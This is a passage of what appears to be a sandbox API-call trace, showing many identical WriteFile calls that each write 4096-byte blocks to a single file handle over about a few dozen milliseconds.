lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.797] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.798] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.798] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.798] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.799] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.799] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.799] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.800] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.800] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.800] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.800] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.801] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.801] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.801] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.802] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.802] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.802] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.803] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.803] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.804] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.804] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.805] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.805] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.805] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.805] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.806] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.806] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.806] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.806] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.807] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.812] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.812] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.813] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.813] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.813] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.813] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.814] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.814] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.814] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.814] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.815] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.815] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.815] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.816] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.816] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.816] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.816] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.817] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.817] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.817] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.817] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.818] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.818] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.818] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.818] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.819] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.819] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.819] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.819] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.820] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.820] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.820] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.820] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.821] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.821] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.821] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.821] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.822] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.822] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.822] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.823] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.823] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.823] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.824] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.824] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.824] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.824] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.825] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.825] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.825] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.825] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.826] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.826] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.827] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.827] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.828] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.828] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.828] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.828] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.829] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.829] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.829] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.829] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.830] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.830] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.830] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.830] WriteFile (in: 